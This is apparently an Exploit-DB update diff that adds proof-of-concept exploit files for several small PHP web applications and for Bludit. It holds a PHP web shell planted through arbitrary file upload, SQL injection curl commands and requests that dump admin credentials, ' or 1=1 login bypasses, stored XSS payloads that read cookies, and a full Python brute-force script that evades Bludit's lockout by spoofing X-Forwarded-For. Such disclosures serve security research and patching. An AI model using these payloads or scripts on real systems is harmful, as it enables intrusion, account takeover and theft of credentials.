DB: 2020-10-24

17 changes to exploits/shellcodes

Online Library Management System 1.0 - Arbitrary File Upload
Ajenti 2.1.36 - Remote Code Execution (Authenticated)
Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection
Car Rental Management System 1.0 - Arbitrary File Upload
User Registration & Login and User Management System 2.1 - SQL Injection
Point of Sales 1.0 - 'id' SQL Injection
Lot Reservation Management System 1.0 - Authentication Bypass
Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)
Gym Management System 1.0 - 'id' SQL Injection
Point of Sales 1.0 - 'username' SQL Injection
School Faculty Scheduling System 1.0 - 'id' SQL Injection
School Faculty Scheduling System 1.0 - 'username' SQL Injection
Gym Management System 1.0 - Authentication Bypass
Gym Management System 1.0 - Stored Cross Site Scripting
Bludit 3.9.2 - Auth Bruteforce Bypass
TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)

exploits/php/webapps/48636.txt

@@ -4,6 +4,7 @@
 # Vendor Homepage: http://ritecms.com/
 # Version: 2.2.1
 # Tested on: Linux
+# CVE: CVE-2020-23934
 
 1- Go to following url. >> http://(HOST)/cms/
 2- Default username and password is admin:admin. We must know login credentials.

exploits/php/webapps/48928.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload
+# Date: 22-10-2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add
+
+#Exploit
+	Fill details
+	Create php shell code with below script
+		<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
+	Click on Browse
+	Select php file
+	Click Save
+	Access below URL:
+		http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir
+	add system commands after cmd to execute it.

exploits/php/webapps/48930.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Stock Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2020-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+fetchSelectedBrand.php
+#
+$brandId = $_POST['brandId'];
+$sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId";
+#
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
+    --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
+    $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php'
+#
+# POC:
+# 2)
+#
+fetchSelectedCategories.php
+#
+$categoriesId = $_POST['categoriesId'];
+$sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId";
+#
+curl -i -s -k -X $'POST' \
+    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
+    --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
+    $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php'
+#
+# ++
+
+#

exploits/php/webapps/48931.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload
+# Date: 22-10-2020
+# Exploit Author: Jyotsna Adhana and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car
+
+#Exploit
+	Fill details
+	Create php shell code with below script
+		<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
+	Click on Browse
+	Select php file
+	Click Save
+	Access below URL:
+		http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo
+	add system commands after cmd to execute it.

exploits/php/webapps/48932.txt

@@ -0,0 +1,23 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection
+# Dork: N/A
+# Date: 2020-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Linux
+# CVE: N/A
+
+# POC: 
+# 1)
+# 
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact
+#
+# <input type="text" class="form-control" name="fname" value="[ID: 1 ] [ Username: xxx ] [ Password: xxx]" >
+#

exploits/php/webapps/48933.txt

@@ -0,0 +1,35 @@
+#Exploit Title: Point of Sales 1.0 - SQL Injection
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1:	Open the URL http://localhost:8081/pos/edit_category.php?id=1
+
+Step 2:	Change the URL http://localhost:8081/pos/edit_category.php?id=1'
+
+Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+
+
+Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+
+
+Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+
+
+
+Malicious Request:::
+
+GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+Upgrade-Insecure-Requests: 1
+
+Gives database name *sourcecodester_posdb*

exploits/php/webapps/48934.txt

@@ -0,0 +1,35 @@
+#Exploit Title: lot reservation management system 1.0 - Authentication Bypass
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1:	Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php 
+
+Step 2:	use payload ' or 1=1 limit 1 -- -+ for both username and password.
+
+
+Malicious Request:::
+
+POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 71
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+
+username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B
+
+You will be login as admin of the application.

exploits/php/webapps/48935.txt

@@ -0,0 +1,87 @@
+#Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
+
+Step 2: Use payload <script>alert("XSS")</script> in Name and Discription.
+
+
+Malicious Request:::
+POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097
+Content-Length: 613
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="name"
+
+<script>alert("XSS")</script>
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="description"
+
+<script>alert("XSS")</script>
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------65714323539404637092301409097--
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="gender"
+
+Female
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="contact"
+
+9876543211
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="nid"
+
+12
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="address"
+
+Gujarat
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="dept"
+
+CS
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="degree"
+
+BE
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="salary"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3267707159765331982713791736--
+
+
+Cookie will be reflected on View Employee.

exploits/php/webapps/48936.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/gym/gym/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+
+//Comment
+Above request will print database name and MariaDB version.

exploits/php/webapps/48937.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Point of Sales 1.0 - 'username' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: username
+# Injected Request
+
+POST /pos/pos/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 81
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/pos/pos/
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login=
+
+//Comment
+The reponse will be delayed by 5s.

exploits/php/webapps/48938.txt

@@ -0,0 +1,24 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+//Comment
+Above request will print database name and MariaDB version.

exploits/php/webapps/48939.txt

@@ -0,0 +1,24 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+//Comment
+Above request will print database name and MariaDB version.

exploits/php/webapps/48940.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Gym Management System 1.0 - Authentication Bypass
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/gym/gym/login.php
+
+Step 2: use payload jyot' or 1=1# in Username and Password field
+
+Malicious Request
+
+POST /gym/gym/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/gym/gym/login.php
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
+
+Step 3: You will be logged in as admin.

exploits/php/webapps/48941.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages
+
+Step 2: use payload <script>alert(document.cookie)</script> in Package Name and Description field
+
+Malicious Request
+POST /gym/gym/ajax.php?action=save_package HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
+Content-Length: 587
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/gym/gym/index.php?page=packages
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="package"
+
+<script>alert(document.cookie)</script>
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="description"
+
+<script>alert(document.cookie)</script>
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="amount"
+
+1
+-----------------------------10391575234966392972740129710--
+
+Step 3: Cookie will be reflected each time someone visits the Packages section.

exploits/php/webapps/48942.py

@@ -0,0 +1,102 @@
+#!/usr/bin/python3
+
+# Exploit
+## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
+## Author: ColdFusionX (Mayank Deshmukh)
+## Author website: https://coldfusionx.github.io
+## Date: 2020-10-19
+## Vendor Homepage: https://www.bludit.com/
+## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
+## Version: <= 3.9.2
+
+# Vulnerability
+## Discoverer: Rastating
+## Discoverer website: https://rastating.github.io/
+## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
+## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
+## Patch: https://github.com/bludit/bludit/pull/1090
+
+'''
+Example Usage:
+- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt 
+'''
+
+import requests
+import sys
+import re
+import argparse, textwrap
+from pwn import *
+
+#Expected Arguments
+parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, 
+epilog=textwrap.dedent(''' 
+Exploit Usage : 
+./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
+./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))                     
+
+parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)") 
+parser.add_argument("-u","--userlist", help="Username Dictionary") 
+parser.add_argument("-p","--passlist", help="Password Dictionary")    
+args = parser.parse_args()
+
+if len(sys.argv) < 2:
+    print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")          
+    sys.exit(1)  
+
+# Variable
+LoginPage = args.url
+Username_list = args.userlist
+Password_list = args.passlist
+
+log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')
+
+def login(Username,Password):
+    session = requests.session()          
+    r = session.get(LoginPage)
+ 
+# Progress Check    
+    process = log.progress('Brute Force')
+
+#Getting CSRF token value
+    CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
+    CSRF = CSRF.group(1)
+
+#Specifying Headers Value
+    headerscontent = {
+    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
+    'Referer' : f"{LoginPage}",
+    'X-Forwarded-For' : f"{Password}"
+    }
+
+#POST REQ data
+    postreqcontent = {
+    'tokenCSRF' : f"{CSRF}",
+    'username' : f"{Username}",
+    'password' : f"{Password}"
+    }
+
+#Sending POST REQ
+    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
+
+#Printing Username:Password            
+    process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            
+
+#Conditional loops    
+    if 'Location' in r.headers:
+        if "/admin/dashboard" in r.headers['Location']:
+            print()
+            log.info(f'SUCCESS !!')
+            log.success(f"Use Credential -> {Username}:{Password}")
+            sys.exit(0)
+    elif "has been blocked" in r.text:
+        log.failure(f"{Password} - Word BLOCKED")
+        
+#Reading User.txt & Pass.txt files
+userfile = open(Username_list).readlines()
+for Username in userfile:
+    Username = Username.strip() 
+   
+passfile = open(Password_list).readlines()
+for Password in passfile:
+    Password = Password.strip()   
+    login(Username,Password)

exploits/php/webapps/48943.py

